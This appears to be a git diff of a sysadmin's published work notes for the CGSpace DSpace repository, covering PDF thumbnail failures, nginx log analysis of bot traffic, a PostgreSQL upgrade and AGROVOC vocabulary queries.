      -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
      +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
       
      • And wow, I can’t even run ImageMagick’s identify on the first page of the second item (10568/98930):
      @@ -213,7 +213,7 @@ zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
    • But with GraphicsMagick’s identify it works:
    $ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
     
    • Interesting that ImageMagick’s identify does work if you do not specify a page, perhaps as alluded to in the recent Ghostscript bug report:
    • @@ -224,20 +224,20 @@ Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010 Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009 Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009 Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009 -identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746. +identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
    • As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):
    $ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
     zsh: abort (core dumped)  convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
     $ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
    -DEBUG: FC_WEIGHT didn't match
    +DEBUG: FC_WEIGHT didn't match
     
    • I inspected the troublesome PDF using jhove and noticed that it is using ISO PDF/A-1, Level B and the other one doesn’t list a profile, though I don’t think this is relevant
    • I found another item that fails when generating a thumbnail (10568/98391, DSpace complains:
    -
    org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    -org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +
    org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.Info.getBaseInfo(Info.java:360)
             at org.im4java.core.Info.<init>(Info.java:151)
             at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
    @@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
             at java.lang.reflect.Method.invoke(Method.java:498)
             at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
             at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
    -Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
             at org.im4java.core.Info.getBaseInfo(Info.java:342)
             ... 14 more
    -Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
    +Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -dFirstPage=1 -dLastPage=1 "-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d" "-f/tmp/magick-14296Q0rJjfCeIj3w" "-f/tmp/magick-14296k_K6MWqwvpDm"' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
             at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
             at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
             at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
    @@ -274,22 +274,22 @@ zsh: abort (core dumped)  convert bnfb_biofortification\ Module_Participants\ Gu
     
    • So far the only thing that stands out is that the two files that don’t work were created with Microsoft Office 2016:
    -
    $ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
    +
    $ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word 2016
     Producer:       Microsoft® Word 2016
    -$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
    +$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word 2016
     Producer:       Microsoft® Word 2016
     
    • And the one that works was created with Office 365:
    -
    $ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
    +
    $ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
     Creator:        Microsoft® Word for Office 365
     Producer:       Microsoft® Word for Office 365
     
    • I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:
    -
    $ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
    +
    $ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
     $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
     
    • I’ve tried a few times this week to register for the Ethiopian eVisa website, but it is never successful
    • @@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
      • Last night Linode sent a message that the load on CGSpace (linode18) was too high, here’s a list of the top users at the time and throughout the day:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018:1(5|6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018:1(5|6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           225 40.77.167.142
           226 66.249.64.63
           232 46.101.86.248
      @@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
           962 66.249.70.27
          1193 35.237.175.180
          1450 2a01:4f8:140:3192::2
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          1141 207.46.13.57
          1299 197.210.168.174
          1341 54.70.40.11
      @@ -345,9 +345,9 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
       
      • 35.237.175.180 is known to us (CCAFS?), and I’ve already added it to the list of bot IPs in nginx, which appears to be working:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
       4772
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
       630
       
      • I haven’t seen 2a01:4f8:140:3192::2 before. Its user agent is some new bot:
      • @@ -356,9 +356,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12
      • At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
       5111
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
       419
       
      • 78.46.79.71 is another host on Hetzner with the following user agent:
      • @@ -368,9 +368,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2
      • This is not the first time a host on Hetzner has used a “normal” user agent to make thousands of requests
      • At least it is re-using its Tomcat sessions somehow:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
       2044
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
       1
       
      • In other news, it’s good to see my re-work of the database connectivity in the dspace-statistics-api actually caused a reduction of persistent database connections (from 1 to 0, but still!):
      • @@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
      • Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night
      • I looked in the logs and there’s nothing particular going on:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "05/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
          1225 157.55.39.177
          1240 207.46.13.12
          1261 207.46.13.101
      @@ -403,9 +403,9 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
       
      • But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:
      -
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
      +
      $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
       6980
      -$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
       1156
       
      • 2a01:7e00::f03c:91ff:fe0a:d645 appears to be the CKM dev server where Danny is testing harvesting via Drupal
      • @@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
      • Linode alerted me twice today that the load on CGSpace (linode18) was very high
      • Looking at the nginx logs I see a few new IPs in the top 10:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "17/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "17/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
           927 157.55.39.81
           975 54.70.40.11
          2090 50.116.102.77
      @@ -505,7 +505,7 @@ $ ls -lh cgspace_2018-12-19.backup*
       
      • Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:
      -
      $ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
      +
      $ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
       Connected to database.
       Fixed 466 occurences of: Copyrighted; Any re-use allowed
       
        @@ -519,7 +519,7 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed # pg_dropcluster 9.6 main # pg_upgradecluster 9.5 main # pg_dropcluster 9.5 main -# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r +# dpkg -l | grep postgresql | grep 9.5 | awk '{print $2}' | xargs dpkg -r
      • I’ve been running PostgreSQL 9.6 for months on my local development and public DSpace Test (linode19) environments
      • Run all system updates on CGSpace (linode18) and restart the server
      • @@ -528,13 +528,13 @@ Fixed 466 occurences of: Copyrighted; Any re-use allowed
        $ dspace cleanup -v
          - Deleting bitstream information (ID: 158227)
          - Deleting bitstream record from database (ID: 158227)
        -Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(158227) is still referenced from table "bundle".
        +Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(158227) is still referenced from table "bundle".
         ...
         
        • As always, the solution is to delete those IDs manually in PostgreSQL:
        -
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
        +
        $ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (158227, 158251);'
         UPDATE 1
         
        • After all that I started a full Discovery reindex to get the index name changes and rights updates
        • @@ -544,7 +544,7 @@ UPDATE 1
        • CGSpace went down today for a few minutes while I was at dinner and I quickly restarted Tomcat
        • The top IP addresses as of this evening are:
        -
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "29/Dec/2018" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             963 40.77.167.152
             987 35.237.175.180
            1062 40.77.167.55
        @@ -558,7 +558,7 @@ UPDATE 1
         
        • And just around the time of the alert:
        -
        # zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E "29/Dec/2018:1(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log.1 /var/log/nginx/*.log.2.gz | grep -E "29/Dec/2018:1(6|7|8)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             115 66.249.66.223
             118 207.46.13.14
             123 34.218.226.147
        diff --git a/docs/2019-01/index.html b/docs/2019-01/index.html
        index 49ca0b03e..a7a9810d7 100644
        --- a/docs/2019-01/index.html
        +++ b/docs/2019-01/index.html
        @@ -12,7 +12,7 @@
         Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
         I don’t see anything interesting in the web server logs around that time though:
         
        -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
              92 40.77.167.4
              99 210.7.29.100
             120 38.126.157.45
        @@ -38,7 +38,7 @@ I don’t see anything interesting in the web server logs around that time t
         Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
         I don’t see anything interesting in the web server logs around that time though:
         
        -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
              92 40.77.167.4
              99 210.7.29.100
             120 38.126.157.45
        @@ -50,7 +50,7 @@ I don’t see anything interesting in the web server logs around that time t
             357 207.46.13.1
             903 54.70.40.11
         "/>
        -
        +
         
         
             
        @@ -141,7 +141,7 @@ I don’t see anything interesting in the web server logs around that time t
         
      • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
      • I don’t see anything interesting in the web server logs around that time though:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
            92 40.77.167.4
            99 210.7.29.100
           120 38.126.157.45
      @@ -155,14 +155,14 @@ I don’t see anything interesting in the web server logs around that time t
       
      • Analyzing the types of requests made by the top few IPs during that time:
      -
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 54.70.40.11 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +
      # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 54.70.40.11 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
            30 bitstream
           534 discover
           352 handle
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 207.46.13.1 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 207.46.13.1 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
           194 bitstream
           345 handle
      -# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 46.101.86.248 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
      +# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | grep 46.101.86.248 | grep -o -E "(bitstream|discover|handle)" | sort | uniq -c
           261 handle
       
      • It’s not clear to me what was causing the outbound traffic spike
      • @@ -283,7 +283,7 @@ org.apache.jasper.JasperException: /home.jsp (line: [214], column: [1]) /discove
        • Linode sent a message last night that CGSpace (linode18) had high CPU usage, but I don’t see anything around that time in the web server logs:
        -
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Jan/2019:1(7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
        +
        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "03/Jan/2019:1(7|8|9)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
             189 207.46.13.192
             217 31.6.77.23
             340 66.249.70.29
        @@ -313,33 +313,33 @@ X-Content-Type-Options: nosniff
         X-Frame-Options: ALLOW-FROM http://aims.fao.org
         
         {
        -    "@context": {
        -        "@language": "en",
        -        "altLabel": "skos:altLabel",
        -        "hiddenLabel": "skos:hiddenLabel",
        -        "isothes": "http://purl.org/iso25964/skos-thes#",
        -        "onki": "http://schema.onki.fi/onki#",
        -        "prefLabel": "skos:prefLabel",
        -        "results": {
        -            "@container": "@list",
        -            "@id": "onki:results"
        +    "@context": {
        +        "@language": "en",
        +        "altLabel": "skos:altLabel",
        +        "hiddenLabel": "skos:hiddenLabel",
        +        "isothes": "http://purl.org/iso25964/skos-thes#",
        +        "onki": "http://schema.onki.fi/onki#",
        +        "prefLabel": "skos:prefLabel",
        +        "results": {
        +            "@container": "@list",
        +            "@id": "onki:results"
                 },
        -        "skos": "http://www.w3.org/2004/02/skos/core#",
        -        "type": "@type",
        -        "uri": "@id"
        +        "skos": "http://www.w3.org/2004/02/skos/core#",
        +        "type": "@type",
        +        "uri": "@id"
             },
        -    "results": [
        +    "results": [
                 {
        -            "lang": "en",
        -            "prefLabel": "soil",
        -            "type": [
        -                "skos:Concept"
        +            "lang": "en",
        +            "prefLabel": "soil",
        +            "type": [
        +                "skos:Concept"
                     ],
        -            "uri": "http://aims.fao.org/aos/agrovoc/c_7156",
        -            "vocab": "agrovoc"
        +            "uri": "http://aims.fao.org/aos/agrovoc/c_7156",
        +            "vocab": "agrovoc"
                 }
             ],
        -    "uri": ""
        +    "uri": ""
         }
         
        • The API does not appear to be case sensitive (searches for SOIL and soil return the same thing)
        • @@ -359,23 +359,23 @@ X-Content-Type-Options: nosniff X-Frame-Options: ALLOW-FROM http://aims.fao.org { - "@context": { - "@language": "en", - "altLabel": "skos:altLabel", - "hiddenLabel": "skos:hiddenLabel", - "isothes": "http://purl.org/iso25964/skos-thes#", - "onki": "http://schema.onki.fi/onki#", - "prefLabel": "skos:prefLabel", - "results": { - "@container": "@list", - "@id": "onki:results" + "@context": { + "@language": "en", + "altLabel": "skos:altLabel", + "hiddenLabel": "skos:hiddenLabel", + "isothes": "http://purl.org/iso25964/skos-thes#", + "onki": "http://schema.onki.fi/onki#", + "prefLabel": "skos:prefLabel", + "results": { + "@container": "@list", + "@id": "onki:results" }, - "skos": "http://www.w3.org/2004/02/skos/core#", - "type": "@type", - "uri": "@id" + "skos": "http://www.w3.org/2004/02/skos/core#", + "type": "@type", + "uri": "@id" }, - "results": [], - "uri": "" + "results": [], + "uri": "" }
        • I guess the results object will just be empty…
        • @@ -386,28 +386,28 @@ $ . /tmp/sparql/bin/activate $ pip install sparql-client ipython $ ipython In [10]: import sparql -In [11]: s = sparql.Service("http://agrovoc.uniroma2.it:3030/agrovoc/sparql", "utf-8", "GET") -In [12]: statement=('PREFIX skos: <http://www.w3.org/2004/02/skos/core#> ' - ...: 'SELECT ' - ...: '?label ' - ...: 'WHERE { ' - ...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } ' - ...: 'FILTER regex(str(?label), "^fish", "i") . ' - ...: '} LIMIT 10') +In [11]: s = sparql.Service("http://agrovoc.uniroma2.it:3030/agrovoc/sparql", "utf-8", "GET") +In [12]: statement=('PREFIX skos: <http://www.w3.org/2004/02/skos/core#> ' + ...: 'SELECT ' + ...: '?label ' + ...: 'WHERE { ' + ...: '{ ?concept skos:altLabel ?label . } UNION { ?concept skos:prefLabel ?label . } ' + ...: 'FILTER regex(str(?label), "^fish", "i") . ' + ...: '} LIMIT 10') In [13]: result = s.query(statement) In [14]: for row in result.fetchone(): ...: print(row) ...: -(<Literal "fish catching"@en>,) -(<Literal "fish harvesting"@en>,) -(<Literal "fish meat"@en>,) -(<Literal "fish roe"@en>,) -(<Literal "fish conversion"@en>,) -(<Literal "fisheries catches (composition)"@en>,) -(<Literal "fishtail palm"@en>,) -(<Literal "fishflies"@en>,) -(<Literal "fishery biology"@en>,) -(<Literal "fish production"@en>,) +(<Literal "fish catching"@en>,) +(<Literal "fish harvesting"@en>,) +(<Literal "fish meat"@en>,) +(<Literal "fish roe"@en>,) +(<Literal "fish conversion"@en>,) +(<Literal "fisheries catches (composition)"@en>,) +(<Literal "fishtail palm"@en>,) +(<Literal "fishflies"@en>,) +(<Literal "fishery biology"@en>,) +(<Literal "fish production"@en>,)
      • The SPARQL query comes from my notes in 2017-08
      @@ -466,7 +466,7 @@ In [14]: for row in result.fetchone():
    • I am testing the speed of the WorldFish DSpace repository’s REST API and it’s five to ten times faster than CGSpace as I tested in 2018-10:
    -
    $ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
    +
    $ time http --print h 'https://digitalarchive.worldfishcenter.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=100&offset=0'
     
     0.16s user 0.03s system 3% cpu 5.185 total
     0.17s user 0.02s system 2% cpu 7.123 total
    @@ -474,7 +474,7 @@ In [14]: for row in result.fetchone():
     
    • In other news, Linode sent a mail last night that the CPU load on CGSpace (linode18) was high, here are the top IPs in the logs around those few hours:
    -
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "14/Jan/2019:(17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
    +
    # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "14/Jan/2019:(17|18|19|20)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
         157 31.6.77.23
         192 54.70.40.11
         202 66.249.64.157
    @@ -651,7 +651,7 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
         at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
         at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
         ... 33 more
    -2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
    +2019-01-16 13:37:55,401 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
         at org.apache.solr.handler.admin.CoreAdminHandler.handleCreateAction(CoreAdminHandler.java:613)
         at org.apache.solr.handler.admin.CoreAdminHandler.handleRequestInternal(CoreAdminHandler.java:199)
